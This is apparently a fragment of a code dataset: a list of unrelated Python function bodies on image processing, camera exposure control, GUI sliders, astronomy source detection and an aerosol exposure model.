cv2.bitwise_not(mask)\n\n filtered_frame = cv2.bitwise_and(frame, frame, mask=mask)\n\n return filtered_frame", "def ring_int(self, tissue):\n print(\"controller - ring_int!\")\n img_cv2_mask = self.pressure_img.ring_ext\n self.pressure_img.roi_crop(img_cv2_mask, tissue, 2)", "def selectOptimalExposureCallback(self):\n rospy.loginfo('Starting automatic exposure selection algorithm')\n\n # Start searching for the optimal exposure\n best_exp_pass1 = self.runPass(range(100, 27100, 3000), rate=self.rate)\n # first pass, find coarse exposure\n if best_exp_pass1 > 0:\n rospy.loginfo('First pass: success!')\n rospy.loginfo(\n 'Best exposure in first pass: {}'.format(best_exp_pass1))\n\n # second pass, refine the exposure\n exp_range = [int(exp) for exp in np.linspace(\n 0.9*best_exp_pass1, 1.1*best_exp_pass1, 10)]\n best_exp_pass2 = self.runPass(exp_range, rate=self.rate)\n\n if best_exp_pass2 > 0:\n rospy.loginfo('Second pass: success!')\n rospy.loginfo(\n 'Best exposure in second pass: {}'.format(best_exp_pass2))\n optimal_exposure = best_exp_pass2\n else:\n rospy.logerr(\n 'Second pass: failure\\nSetting the best exposure found in first pass')\n optimal_exposure = best_exp_pass1\n\n self.client.update_configuration({\"exposure\": optimal_exposure})\n self.reset()\n\n else:\n rospy.logerr(\n 'First pass: failure\\nCould not auto-set the exposure')", "def sharpen_slide(self):\r\n std_input = self.horizontal.get() # Get the std defined by user\r\n c_input = self.vertical.get() # get the constant defined by the user\r\n img = self.master.images[-1] # Use the most recent displayed image for sharpening\r\n sharpened_image = sharpen.gaussian_unsharp_masking(img, std_input, c_input) # Apply unsharp masking on image\r\n self.master.display_image.display_image(img=sharpened_image) # display sharpened image\r\n self.master.images.append(sharpened_image) # Append the sharpened image on the stack\r", "def adjust_brightness(img, brightness_factor):\n check_type(img)\n\n enhancer = ImageEnhance.Brightness(img)\n img = enhancer.enhance(brightness_factor)\n return img", "def draw_exposure_lim(self, skymap):\n\n rightascensions = np.linspace(-180, 180, self.num_points) \n limiting_dec = self.limiting_dec.deg\n boundary_decs = np.tile(limiting_dec, self.num_points)\n c = SkyCoord(ra = rightascensions * u.degree,\n dec = boundary_decs * u.degree, frame = 'icrs')\n lon = c.galactic.l.deg\n lat = c.galactic.b.deg\n\n skymap.scatter(lon, lat, latlon = True, s = 10, \n color = 'k', alpha = 0.1,\n label = 'limit of ' + self.label + '\\'s exposure')", "def create_contrast_slider(self):\n contrast_max = 0\n for scan_dir in self.ff:\n temp_max = np.max(np.abs(scan_dir.data_fft))\n if temp_max > contrast_max:\n contrast_max = temp_max\n\n self.contrast_slider = widgets.IntSlider(min=0, max=100, step=1, value=50, continuous_update=False,\n description='Contrast', readout=False)", "def calibrate_white_balance(self, channel: LC):\n\n d_print(\"Warming up camera sensor...\", 1)\n\n # turn on channel light\n self.light_control(channel, 1)\n\n if channel == LC.WHITE:\n with picamera.PiCamera() as sensor:\n # set up the sensor with all its settings\n sensor.resolution = (128, 80)\n sensor.rotation = self.config[\"rotation\"]\n sensor.framerate = self.settings.framerate[channel]\n sensor.shutter_speed = self.settings.shutter_speed[channel]\n\n # set up the blue and red gains\n sensor.awb_mode = \"off\"\n rg, bg = (1.1, 1.1)\n sensor.awb_gains = (rg, bg)\n\n # now sleep and lock exposure\n time.sleep(20)\n sensor.exposure_mode = self.settings.exposure_mode\n\n # record camera data to array and scale up a numpy array\n #rgb = np.zeros((1216,1216,3), dtype=np.uint16)\n with picamera.array.PiRGBArray(sensor) as output:\n # capture images and analyze until convergence\n for i in range(30):\n output.truncate(0)\n sensor.capture(output, 'rgb')\n rgb = np.copy(output.array)\n\n #crop = rgb[508:708,666:966,:]\n crop = rgb[30:50,32:96,:]\n\n r, g, b = (np.mean(crop[..., i]) for i in range(3))\n d_print(\"\\trg: {:4.3f} bg: {:4.3f} --- ({:4.1f}, {:4.1f}, {:4.1f})\".format(rg, bg, r, g, b), 1)\n\n if abs(r - g) > 1:\n if r > g:\n rg -= 0.025\n else:\n rg += 0.025\n if abs(b - g) > 1:\n if b > g:\n bg -= 0.025\n else:\n bg += 0.025\n\n sensor.awb_gains = (rg, bg)\n else:\n rg = self.settings.wb[LC.GROWTH][\"r\"]\n bg = self.settings.wb[LC.GROWTH][\"b\"]\n\n # turn off channel light\n self.light_control(channel, 0)\n\n self.config[\"wb\"][channel] = dict()\n self.config[\"wb\"][channel][\"r\"] = rg\n self.config[\"wb\"][channel][\"b\"] = bg\n\n d_print(\"Done.\", 1)", "def apply_mask(frame):\n # resize blur it, and convert fame to the HSV\n #frame = imutils.resize(frame, width=FRAME_W, height=FRAME_H)\n frame = cv2.resize(frame, (FRAME_W, FRAME_H), interpolation=3)\n blurred = cv2.GaussianBlur(frame, (11, 11), 0)\n hsv = cv2.cvtColor(blurred, cv2.COLOR_BGR2HSV)\n\n #mask colour out and clean up the mask\n mask = cv2.inRange(hsv, GREEN_LOWER, GREEN_UPPER)\n mask = cv2.erode(mask, None, iterations=2)\n mask = cv2.dilate(mask, None, iterations=2)\n\n return frame, mask", "def resetCamera(self, bounds):\n\n center = 0.5 * (bounds[0] + bounds[1])\n radius = numpy.linalg.norm(0.5 * (bounds[1] - bounds[0]))\n if radius == 0.: # bounds are all collapsed\n radius = 1.\n\n if isinstance(self.intrinsic, transform.Perspective):\n # Get the viewpoint distance from the bounds center\n minfov = numpy.radians(self.intrinsic.fovy)\n width, height = self.intrinsic.size\n if width < height:\n minfov *= width / height\n\n offset = radius / numpy.sin(0.5 * minfov)\n\n # Update camera\n self.extrinsic.position = \\\n center - offset * self.extrinsic.direction\n self.intrinsic.setDepthExtent(offset - radius, offset + radius)\n\n elif isinstance(self.intrinsic, transform.Orthographic):\n # Y goes up\n self.intrinsic.setClipping(\n left=center[0] - radius,\n right=center[0] + radius,\n bottom=center[1] - radius,\n top=center[1] + radius)\n\n # Update camera\n self.extrinsic.position = 0, 0, 0\n self.intrinsic.setDepthExtent(center[2] - radius,\n center[2] + radius)\n else:\n raise RuntimeError('Unsupported camera: %s' % self.intrinsic)", "def increase_brightness(image, value=18):\n hsv = cv2.cvtColor(image, cv2.COLOR_BGR2HSV)\n h, s, v = cv2.split(hsv)\n\n lim = 255 - value\n v[v > lim] = 255\n v[v <= lim] += value\n\n final_hsv = cv2.merge((h, s, v))\n image = cv2.cvtColor(final_hsv, cv2.COLOR_HSV2BGR)\n return image", "def equalize_exposure(image, iterations=1, kernel_size=None, min_object_size=500, dark_objects=True, stretch=False):\n\n # Housekeeping\n img = img_as_float(image.copy())\n\n if stretch is True:\n img = img/img.max()\n\n if dark_objects is False:\n img = 1-img # invert\n\n img_in = img.copy() # for use later\n\n if kernel_size is None:\n kernel_size = np.int(max(image.shape[0], image.shape[1])/10)\n\n # mean filter kernel\n kernel = morphology.disk(int(kernel_size/2))\n\n # identify objects to ignore\n if kernel_size % 2 is 0:\n block_size = kernel_size + 1\n else:\n block_size = kernel_size\n\n #objects = ~filters.threshold_adaptive(img, block_size, offset = 0.01*img.max()) # deprecated function\n objects = img > filters.threshold_local(img, block_size, offset = 0.01*img.max())\n objects = morphology.remove_small_objects(objects, min_size = min_object_size)\n\n # Correct Exposure x times\n i = 0\n while i < iterations:\n # Global mean\n img_mean = np.ma.masked_array(img, mask=objects).mean()\n\n # global means\n local_means = filters.rank.mean(img, selem=kernel, mask=~objects)\n local_means = filters.gaussian(local_means, kernel_size)\n\n # Correct Image\n img += (img_mean - local_means)\n img[img>1] = 1 # for compatibilty with img_as_float\n img[img<0] = 0 # for compatibilty with img_as_float\n i += 1\n\n out = img_as_float(img)\n\n return(out)", "def apply(self,src,dst):\n cv2.filter2D(src,-1,self._kernel,dst) #The second argument specifies the per-channel depth of the destination image\n #(such as cv2.CV_8U for 8 bits per channel). A negative value (as used here) means\n #that the destination image has the same depth as the source image.", "def enhance_contrast(img):\n for y in range(frame_height):\n for x in range(frame_width):\n if img[y, x, 1] > 100:\n # range of blues to limit of puppet motion 255/(frame_width - 150)\n img[y][x][0] = x*0.4\n if img[y, x, 1] <= 100:\n img[y][x][2] = img[y][x][2]*0.5\n cv2.imwrite(\"contrasted.png\", img)", "def __init__(self,\n low,\n high,\n clipping_lower_bound=-np.inf,\n clipping_upper_bound=np.inf):\n super().__init__()\n self._low = low\n self._high = high\n self._clipping_lower_bound = clipping_lower_bound\n self._clipping_upper_bound = clipping_upper_bound", "def _fcn_minmax_roi(self):\n self.roi._update_cbar_minmax()\n self.cbqt.cbobjs._objs['roi']['clim'] = self.roi._clim\n kwargs = self.cbqt.cbobjs._objs['roi'].to_kwargs(True)\n self.roi.update_from_dict(kwargs)\n self.roi._update_cbar()", "def skywalker(this, **kargs):\n\t\t\n\t\t# Arguments\n\t\tbin = kargs.get('bin', this._BINARY)\n\t\toffshore = kargs.get('offshore', 5)\n\t\tminSize = kargs.get('minSize', 3)\n\t\tblur = kargs.get('blur', False)\n\t\t\n\t\tif blur: # Flou de test\n\t\t\tkernel = np.ones((3, 3), np.float32)/9\n\t\t\tbin = cv2.filter2D(bin, -1, kernel)\n\t\t\n\t\t# On duplique l'image pour le rendu final\n\t\tscan = EmptyFrom(bin, 3)\n\t\tscan[:,:,0] = scan[:,:,1] = scan[:,:,2] = bin\n\t\tthis._SCAN = scan\n\t\t\n\t\tstep = 0 # Compteur de pas dans le vide\n\t\tstart, end = None, None\n\t\t\n\t\t# Dimensions de l'image à scanner\n\t\tsize = D2Point(width(bin), height(bin))\n\t\tratio = size if minSize < 1 else 1\n\t\t\n\t\t# Scan pixel par pixel, en partant du bas\n\t\tfor v in xrange(int(size.y)-1, -1, -1):\n\t\t\tfor u in xrange(int(size.x)):\n\t\t\t\n\t\t\t\tif bin.item((v, u)): # Si un pixel != 0:\n\t\t\t\t\tscan[v,u] = [0, 0, 255] # Rouge.\n\t\t\t\t\tstep = 0 # On reset le jump\n\t\t\t\t\t\n\t\t\t\t\t# Si c'est le premier\n\t\t\t\t\tif not start:\n\t\t\t\t\t\tstart = D2Point(u, v)\n\t\t\t\t\t\tend = D2Point(u, v)\n\t\t\t\t\telse: # On trace\n\t\t\t\t\t\tend.x, end.y = u, v\n\t\t\t\t\n\t\t\t\telif end:\n\t\t\t\t\tif step < offshore:\n\t\t\t\t\t\tscan[v,u] = [0, 255, 255] # Jaune\n\t\t\t\t\t\tstep += 1 # On continue\n\t\t\t\t\telif abs((start - end)/ratio) < minSize:\n\t\t\t\t\t\tstart, end = None, None\n\t\t\t\t\telse: break\n\t\t\t\t# elif end: break\n\t\t\t###\n\t\t\tif end: break\n\t\t###\n\t\t\n\t\tif end: # Si on a trouvé une fin\n\t\t\t\n\t\t\t# Point médian = doigt\n\t\t\tresult = start % end\n\t\t\t\n\t\t\t# Visuel\n\t\t\tscan[:,result.x,:] = [0, 255, 0] # On trace une bande verte\n\t\t\tscan[result.y,:,:] = [0, 127, 0] # On trace une autre bande verte\n\t\t\t\n\t\t\t# Reformatage\n\t\t\tresult /= size-1 # On remet en ratio d'image\n\t\t\tresult.x = 1 - result.x # On inverse le côté de mesure\n\t\t\t\n\t\t\t# Stockage\n\t\t\tthis._DETECTED = result # On stocke le point détecté\n\t\t\tthis._BOTTOM = result.y == 1 # On clic ou bien ?\n\t\t\n\t\t# Si rien\n\t\telse:\n\t\t\tresult = None\n\t\t\tthis._BOTTOM = False\n\t\t\n\t\t# Tchao\n\t\treturn result", "def update():\n # TODO: Park the car 30 cm away from the closest orange cone.\n # Use both color and depth information to handle cones of multiple sizes.\n # You may wish to copy some of your code from lab2b.py\n global speed\n global angle\n global curState\n # Search for contours in the current color image\n update_contour()\n\n imgX = rc.camera.get_width()\n\n depth_image = rc.camera.get_depth_image()\n depth_image_adjust = (depth_image - 0.01) % 9999\n depth_image_adjust_blur = cv.GaussianBlur(depth_image_adjust, (11,11), 0)\n\n contour_x = contour_center[1]\n contour_y = contour_center[0]\n\n if contour_center is not None:\n angle = rc_utils.remap_range(contour_center[1],0,imgX,-1,1)\n\n contour_distance = depth_image_adjust_blur[contour_y][contour_x]\n\n print(contour_distance)\n # TODO: Park the car 30 cm away from the closest orange cone\n if curState == State.search:\n rc.drive.set_speed_angle(0.5, 1)\n \n if contour_center is not None:\n curState = State.approach\n\n elif curState == State.approach:\n # rc.drive.set_speed_angle(0.5, angle)\n\n if contour_distance > 50:\n rc.drive.set_speed_angle(0.3,angle)\n elif contour_distance > 32:\n rc.drive.set_speed_angle(0.1,angle)\n elif contour_distance == 32:\n rc.drive.set_speed_angle(-0.1,angle)\n elif contour_distance < 32:\n curState = State.stop\n print(\"stop\")\n\n elif curState == State.stop:\n rc.drive.set_speed_angle(0,0)\n\n pass", "def toggle_exposure(self):\n\n checked1 = self.exp1_radio.isChecked()\n if checked1:\n self.exp2_radio.setChecked(True)\n else:\n self.exp1_radio.setChecked(True)\n self.select_exposure()", "def create_seam_cut(orig_scene, mask_scene, \n match_scene=None, orig_scene_no_mask=None):\n \n if match_scene == None:\n match_scene = np.ones(orig_scene.shape) * 255\n match_scene[orig_scene.shape[0], orig_scene.shape[1]] = 0\n if orig_scene_no_mask == None:\n orig_scene_no_mask = np.ones(orig_scene.shape) * 255\n orig_scene_no_mask[orig_scene.shape[0], orig_scene.shape[1]] = 0\n \n \n diff = np.absolute(np.subtract(match_scene, orig_scene))\n diff_gray = cv2.cvtColor(diff, cv2.COLOR_BGR2GRAY).astype(np.float)\n \n for x in range(mask_scene.shape[0]):\n for y in range(mask_scene.shape[1]):\n if mask_scene[x,y] == 0:\n diff_gray[x,y] = np.inf\n \n mask_info = np.where(mask_scene == 0)\n\n min_x, max_x, min_y, max_y = min(mask_info[0]), max(mask_info[0]), min(mask_info[1]), max(mask_info[1])\n #print min_x, max_x, min_y, max_y\n \n # make 4 cuts, top left to top right, top left to bottom left, top right to bottom right and bottom left to bottom right.\n adj = 10\n dim_diff = diff_gray.shape\n\n\n NW_top = zip([0]*len(range(0, min_y-adj)), range(0, min_y-adj))\n NW_left = zip(range(0, min_x-adj), [0]*len(range(0, min_x-adj))) \n top_left = NW_top + NW_left\n\n NE_top = zip([0]*len(range(max_y+adj, dim_diff[1])), range(max_y+adj, dim_diff[1]))\n NE_right = zip(range(0, min_x-adj), [dim_diff[1]-1]*len(range(0, min_x-adj)))\n top_right = NE_top + NE_right\n\n\n SW_left = zip([dim_diff[0]-1]*len(range(0, min_y-adj)), range(0, min_y-adj))\n SW_bot = zip(range(max_x + adj, dim_diff[0]), [0]*len(range(max_x + adj, dim_diff[0])))\n bottom_left = SW_left + SW_bot\n\n SE_right = zip([dim_diff[0]-1]*len(range(max_y+adj, dim_diff[1])), range(max_y+adj, dim_diff[1]))\n SE_bot = zip(range(max_x + adj, dim_diff[0]), [dim_diff[1]-1]*len(range(max_x + adj, dim_diff[0])))\n bottom_right = SE_right + SE_bot\n \n diff_path = np.zeros(diff_gray.shape)\n \n try: \n costMCP = skimage.graph.MCP(diff_gray, fully_connected=True)\n cumpath, trcb = costMCP.find_costs(starts=NW_left, ends=NE_right)\n \n for _ in range(10):\n path_tltr = costMCP.traceback(choice(NE_right)) # select a random end point\n for x,y in path_tltr:\n diff_path[x, y] = 255 \n except:\n pass\n \n try:\n costMCP = skimage.graph.MCP(diff_gray, fully_connected=True)\n cumpath, trcb = costMCP.find_costs(starts=NW_top, ends=SW_bot)\n \n # get 10 random paths...\n for _ in range(10):\n path_tlbl = costMCP.traceback(choice(SW_bot))\n for x,y in path_tlbl:\n diff_path[x, y] = 255 \n except:\n pass\n\n try:\n costMCP = skimage.graph.MCP(diff_gray, fully_connected=True)\n cumpath, trcb = costMCP.find_costs(starts=NE_top, ends=SE_bot)\n \n # get 10 random paths...\n for _ in range(10):\n path_trbr = costMCP.traceback(choice(SE_bot))\n for x,y in path_trbr:\n diff_path[x, y] = 255\n except:\n pass\n \n try:\n costMCP = skimage.graph.MCP(diff_gray, fully_connected=True)\n cumpath, trcb = costMCP.find_costs(starts=SW_left, ends=SE_right)\n \n \n # get 10 random paths...\n for _ in range(10):\n path_blbr = costMCP.traceback(choice(bottom_right))\n for x,y in path_blbr:\n diff_path[x, y] = 255\n except:\n pass\n \n #use flood fill to add in the mask area.\n \n h,w = diff_path.shape\n mask = np.zeros((h+2,w+2),np.uint8) \n diff = (1,1)\n # make sure you recast the type\n #plt.imshow(diff_path)\n \n # select random point in the mask\n orig_mask = np.where(orig_scene_no_mask == 0)\n \n #print diff_path.shape, (orig_mask[0][rnd_point], orig_mask[1][rnd_point])\n #print mask.shape\n for _ in range(10):\n try:\n rnd_point = choice(range(len(orig_mask[0]))) \n diff_fill = cv2.floodFill(diff_path.astype(np.uint8),mask,\n (orig_mask[0][rnd_point], orig_mask[1][rnd_point]), (255, 255),diff,diff)[1] \n break\n except:\n pass\n # to make floodfill work\n # erode and dialate the result...\n kernel = np.ones((5,5),np.uint8)\n diff_fill = cv2.erode(diff_fill, kernel, iterations = 2)\n diff_fill = cv2.dilate(diff_fill, kernel, iterations = 2)\n \n # blur and threshold...\n diff_fill = cv2.blur(diff_fill, (10,10))\n diff_fill = cv2.threshold(diff_fill, 5, 255, cv2.THRESH_BINARY)[1]\n return np2to3(diff_fill)", "def find_exposure_time(cam,targetIntensity=100,margin=5):\n from numpy import mean\n\n if targetIntensity < 0 or targetIntensity > 255:\n print(\"Invalid target intensity\")\n return 1\n minExposure = 0.01 # Smallest value in ms\n maxExposure = 80\n counter = 0\n\n # Calculate exposures at the different end\n Image = cam.grab_image(timeout='1s', copy=True,\n exposure_time=number_to_millisecond(minExposure))\n minIntensity = mean(Image)\n\n Image = cam.grab_image(timeout='1s', copy=True,\n exposure_time=number_to_millisecond(maxExposure))\n maxIntensity = mean(Image)\n\n midIntensity = 1\n while midIntensity < (targetIntensity - margin) or\\\n midIntensity > (targetIntensity+margin) and counter < 20:\n # Set exposure, take a picture and check how good it was\n counter = counter + 1\n\n midExposure = (maxExposure + minExposure) / 2\n Image = cam.grab_image(timeout='1s',\n copy=True,\n exposure_time=number_to_millisecond(midExposure))\n midIntensity = mean(Image)\n\n if midIntensity > targetIntensity: # Exposure time too short\n maxExposure = midExposure\n # maxIntensity = midIntensity\n else: # Exposure time too long\n minExposure = midExposure\n # minIntensity = midIntensity\n if counter == 100:\n print(\"WARNING: Find exposure function ran max number of iterations!\\\n No really suitable exposure setting found\")\n # Update the exposure time of the camera and return the target exposure\n cam.set_defaults(exposure_time=number_to_millisecond(midExposure))\n return midExposure#number_to_millisecond(midExposure)", "def edge_detector_released(self, event):\r\n if self.winfo_containing(event.x_root, event.y_root) == self.edge_detector_button: # Clicked area has edge\r\n # detector button\r\n if self.image_present_check(): # Check if image is displayed, else throw error message box\r\n self.horizontal = Scale(self, from_=0.00, to=255.00, resolution = 0.5, orient=HORIZONTAL) # Slider for\r\n # adjusting the threshold of Sobel Detector\r\n self.horizontal.pack() # Pack the slider in the GUI window\r\n edge_detect_button = Button(self, text = \"Set threshold\", command = self.edge_detect_slide).pack()\r\n # Button for the user to change the threshold. It will call edge_detect_slide whenever\r\n # the button is pressed\r", "def sharpening_released(self, event):\r\n if self.winfo_containing(event.x_root, event.y_root) == self.sharpening_button: # If clicked area contains the \r\n # sharpening button\r\n if self.image_present_check(): # Check if image is being displayed, if not throw error box.\r\n self.horizontal = Scale(self, from_=0.00, to=100.00, resolution = 0.5, orient=HORIZONTAL) # Slider for \r\n # taking the STD of gaussian kernel\r\n self.horizontal.pack() # pack the slider onto GUI screen\r\n self.vertical = Scale(self, from_=0.00, to=100.00, resolution = 0.5, orient=VERTICAL) # Slider for\r\n # taking the value of the constant\r\n self.vertical.pack() # pack the slider onto GUI screen\r\n sharpen_button = Button(self, text=\"Set sharpening constants\", command=self.sharpen_slide).pack()\r\n # Button which the user clicks to set the input. On clicking, the sharpen_slide function is called\r", "def deposited_exposure_between_bounds(self, time1: float, time2: float) -> _VectorisedFloat:\n deposited_exposure: _VectorisedFloat = 0.\n for interaction in self.short_range:\n start, stop = interaction.extract_between_bounds(time1, time2)\n short_range_jet_exposure = interaction._normed_jet_exposure_between_bounds(\n self.concentration_model, start, stop)\n short_range_lr_exposure = interaction._normed_interpolated_longrange_exposure_between_bounds(\n self.concentration_model, start, stop)\n dilution = interaction.dilution_factor()\n\n fdep = interaction.expiration.particle.fraction_deposited(evaporation_factor=1.0)\n diameter = interaction.expiration.particle.diameter\n \n # Aerosols not considered given the formula for the initial\n # concentration at mouth/nose.\n if diameter is not None and not np.isscalar(diameter):\n # We compute first the mean of all diameter-dependent quantities\n # to perform properly the Monte-Carlo integration over\n # particle diameters (doing things in another order would\n # lead to wrong results for the probability of infection).\n this_deposited_exposure = (np.array(short_range_jet_exposure\n * fdep).mean()\n - np.array(short_range_lr_exposure * fdep).mean()\n * self.concentration_model.infected.activity.exhalation_rate)\n else:\n # In the case of a single diameter or no diameter defined,\n # one should not take any mean at this stage.\n this_deposited_exposure = (short_range_jet_exposure * fdep\n - short_range_lr_exposure * fdep\n * self.concentration_model.infected.activity.exhalation_rate)\n\n # Multiply by the (diameter-independent) inhalation rate\n deposited_exposure += (this_deposited_exposure *\n interaction.activity.inhalation_rate\n /dilution)\n\n # Then we multiply by diameter-independent quantities: viral load\n # and fraction of infected virions\n f_inf = self.concentration_model.infected.fraction_of_infectious_virus()\n deposited_exposure *= (f_inf\n * self.concentration_model.virus.viral_load_in_sputum\n * (1 - self.exposed.mask.inhale_efficiency()))\n # Long-range concentration\n deposited_exposure += self.long_range_deposited_exposure_between_bounds(time1, time2)\n\n return deposited_exposure", "def test_edit_blurred_image(self):\n blur_input_image = np.array([\n 0.28641213, 0.32315277, 0.3871898, 0.46174035, 0.52684723, 0.56466555\n ])\n expected_image_lower = np.array([\n 0.384, 0.395, 0.414, 0.435, 0.454, 0.465\n ])\n expected_image_upper = np.array([\n 0.385, 0.396, 0.415, 0.436, 0.455, 0.466\n ])\n output_config = FilterImageConfig()\n output_config.effect.sigma = 3\n output_config.blur.linear = True\n output = localHDR.blur_image(blur_input_image, output_config.blur)\n output_config.mode = \"global\"\n output_config.lum_scale = 10\n output_config.chrom_scale = .2\n self.assertTrue(np.allclose(output, expected_image_lower, atol=6e-03))\n self.assertTrue(np.allclose(output, expected_image_upper, atol=6e-03))", "def select_exposure(self):\n exp1_selected = self.exp1_radio.isChecked()\n\n if self.recording_sequence:\n self.record_sequence() # stop current recording\n\n if exp1_selected: # then exp1\n ifi_ndx = self.exp1_ifi_select.currentIndex()\n self.camera.set_exposure(self.exp1_select.currentIndex(), ifi_ndx)\n else:\n ifi_ndx = self.exp2_ifi_select.currentIndex()\n self.camera.set_exposure(self.exp2_select.currentIndex(), ifi_ndx)\n\n temp = list(self.dpar.iwindow_toggle_save)\n self.dpar.iwindow_toggle_save = list(self.dpar.iwindow[0])\n self.dpar.iwindow[0] = temp\n self._update_scrollbars()\n\n self.rec_seq_button.setEnabled(ifi_ndx > 0)\n\n et = np.int(np.round(self.camera.actual_exposure_time_ms))\n self.write_to_log('Exposure %d ms' % et)", "def find_components(image,deltaPix,lens_rad_arcsec = 6.0,lens_rad_ratio = None,\n center_x = None,center_y = None, gal_rad_ratio = 0.1,\n min_size_arcsec=0.7,thresh=0.5, many_sources = True,\n show_locations=False, title = None):\n\n # convert minimum component size in pixel units\n min_size = int(min_size_arcsec / deltaPix)\n \n #Convert lens radius and central galaxy radius to pixels\n if lens_rad_ratio == None:\n lens_rad = int(lens_rad_arcsec / deltaPix)\n else: lens_rad = int(len(image) * lens_rad_ratio)\n gal_rad = int(len(image) * gal_rad_ratio)\n \n \n# im2[im2 < im2.min() + 10.*thresh] = 0.\n \n # downscale source image to data resolution (for speed + easier for converting to data units)\n #down = image_util.re_size(image, factor=supersampling_factor_source)\n \n # apply laplacian of gaussian (LoG) filter to enhance maxima\n LoG = - gaussian_laplace(deepcopy(image), sigma = min_size, mode='constant', cval=0.) \n \n# LoG = - gaussian_laplace(deepcopy(im2), sigma = 2., mode='constant', cval=0.)\n \n filtered = deepcopy(LoG)\n \n# print(LoG.min(),LoG.max(),np.abs(LoG.min()) + thresh )\n \n# print(type(filtered))\n \n #background mean and std of filtered image \n corners = np.zeros([4,5,5])\n corners[0] = LoG[0:5,0:5]\n corners[1] = LoG[-5:,0:5]\n corners[2] = LoG[0:5,-5:]\n corners[3] = LoG[-5:,-5:]\n means = []\n stds = []\n for c in corners:\n mn,med,s = sigma_clipped_stats(c,sigma=3.0)\n means.append(mn)\n stds.append(s)\n \n stds=np.array(stds)\n means = np.array(means)\n means_std = np.std(means)\n# means_good = means[(means >= means.mean() - 1.0 * means_std) & (means <= means.mean() + 1.0 * means_std)]\n means_good = means[(np.abs(means) <= np.abs(means).min() + 1.0 * means_std)]\n mean_bg = np.mean(means_good)\n std_bg = np.mean(stds[(np.abs(means) <= np.abs(means).min() + 1.0 * means_std)])\n# print('LoG means: {}, Log means std: {}, Log means good: {}, LoG avg mean: {}'.format(means,means_std,means_good,mean_bg))\n# print('min: {}, max: {}, cut: {}'.format(LoG.min(),LoG.max(),mean_bg + thresh))\n# print(LoG.min(),LoG.max(),filtered.min() + thresh)\n \n \n # assume all value below max*threshold can not be maxima, so put all to zero\n# filtered[filtered < thresh*filtered.max()] = 0.\n \n# assume all value below min*threshold can not be maxima, so put all to zero\n# filtered[filtered < filtered.min() + thresh * np.abs(filtered.min())] = 0.\n# filtered[filtered < mean_bg + thresh] = 0.\n filtered[filtered < mean_bg + 6.*std_bg] = 0. #set pixels below the mean + 6x threshold to 0\n \n # find coordinates of local maxima\n #print(int(0.5 * min_size))\n max_idx_2d_small = peak_local_max(filtered, min_distance=0) #All bright pixels\n max_idx_2d_large = peak_local_max(filtered, min_distance=1) #peaks with min size of 1 pixel\n \n x_list_small, y_list_small = max_idx_2d_small[:, 1], max_idx_2d_small[:, 0]\n x_list_large, y_list_large = max_idx_2d_large[:, 1], max_idx_2d_large[:, 0]\n \n im_center_x, im_center_y = len(image) / 2., len(image) / 2. #center of image\n \n if (center_x == None) & (center_y == None):\n new_center_x, new_center_y = im_center_x,im_center_y\n else:\n new_center_x, new_center_y = center_x,center_y #new \"center\" = location of lens galaxy\n \n \n #distance of each detected peak from center\n R_small = np.sqrt((x_list_small - new_center_x)**2 + (y_list_small - new_center_y)**2) \n R_large = np.sqrt((x_list_large - new_center_x)**2 + (y_list_large - new_center_y)**2)\n \n #Contaminant light is only bright pixels further from center than lens_rad\n x_sats, y_sats = x_list_small[R_small > lens_rad], y_list_small[R_small > lens_rad]\n \n if many_sources:\n x_lens, y_lens = deepcopy(x_list_small), deepcopy(y_list_small)\n else:\n x_lens, y_lens = deepcopy(x_list_large), deepcopy(y_list_large)\n \n# x_lens, y_lens = x_list_small[R_small <= lens_rad], y_list_small[R_small <= lens_rad]\n \n if (len(x_lens) == 0) & (len(y_lens) == 0):\n x_lens = [0,15]\n y_lens = [0,15]\n \n sources = QTable([x_lens, y_lens],names={'x_local_peak','y_local_peak'}) #make table of all detected objects\n# print(x_list_large)\n# print(y_list_large)\n# print(sources)\n \n # show maxima on image for debug\n \n if show_locations:\n# fig = plt.figure(figsize=(4, 4))\n #plt.imshow(image, origin='lower', cmap=cmap_flux, norm=LogNorm(1e-2))\n \n f, axes = plt.subplots(1, 5, figsize=(20,5), sharex=False, sharey=False)\n# plt.figure(figsize = (8,8))\n# plt.subplot(1,2,1)\n \n axes[0].imshow(image, origin='lower', norm=SymLogNorm(5))\n axes[0].set_title('Image')\n axes[0].set_axis_off()\n \n \n axes[1].imshow(LoG, origin='lower', norm=SymLogNorm(5))\n axes[1].set_title('LoG Filtered Image')\n axes[1].set_axis_off()\n\n# plt.subplot(1,2,2)\n axes[2].imshow(filtered, origin='lower', norm=SymLogNorm(5))\n axes[2].set_title('Final Filtered Image')\n axes[2].set_axis_off()\n \n axes[3].imshow(image, origin='lower', norm=SymLogNorm(5))\n for i in range(len(x_lens)):\n axes[3].scatter([x_lens[i]], [y_lens[i]], c='red', s=60, marker='+')\n \n for i in range(len(x_list_large)):\n axes[3].scatter([x_list_large[i]], [y_list_large[i]], c='black', s=100, marker='x')\n axes[3].set_title('Detected Objects')\n axes[3].set_axis_off()\n \n axes[4].imshow(image, origin='lower', norm=SymLogNorm(5))\n \n for i in range(len(x_sats)):\n axes[4].scatter([x_sats[i]], [y_sats[i]], c='red', s=60, marker='+')\n \n# plt.annotate(i+1, (x_list[i], y_list[i]), color='black')\n \n# for i in range(len(x_mask)):\n# plt.scatter([x_mask[i]], [y_mask[i]], c='red', s=100, marker='*')\n# plt.annotate(i+1, (x_mask[i], y_mask[i]), color='red')\n axes[4].scatter(new_center_x, new_center_y,c='red', s=100, marker='*')\n \n draw_lens_circle = Circle((new_center_x, new_center_y),lens_rad ,fill=False)\n draw_gal_circle = Circle((new_center_x, new_center_y),gal_rad, fill = False)\n# plt.gcf().gca().add_artist(draw_lens_circle)\n# plt.gcf().gca().add_artist(draw_gal_circle)\n axes[4].add_patch(draw_lens_circle)\n# axes[4].add_patch(draw_gal_circle)\n \n axes[4].set_title('Pixels to Mask: \\n r = {:.3f}'.format(lens_rad_arcsec))\n axes[4].text(1, 1, \"detected components\", color='red')\n axes[4].set_axis_off()\n \n if title != None:\n f.suptitle(title, fontsize = 15)\n# plt.show()\n \n \n return (x_sats, y_sats), (new_center_x, new_center_y), sources", "def filteringEngine(original, debug=False):\n\n processedImage1 = filterNotInRange(original, LABmin_healthy, LABmax_healthy, cv2.COLOR_BGR2LAB)\n processedImage2 = filterNotInRange(original, LABmin_terrain, LABmax_terrain, cv2.COLOR_BGR2LAB)\n # Image containing many FPs\n processedImage3 = filterNotInRange(original, HSVmin_yellow, HSVmax_yellow, cv2.COLOR_BGR2HSV)\n\n sum1 = cv2.add(processedImage1, processedImage2)\n sub1 = differentialNode(original, sum1)\n\n processedImage = 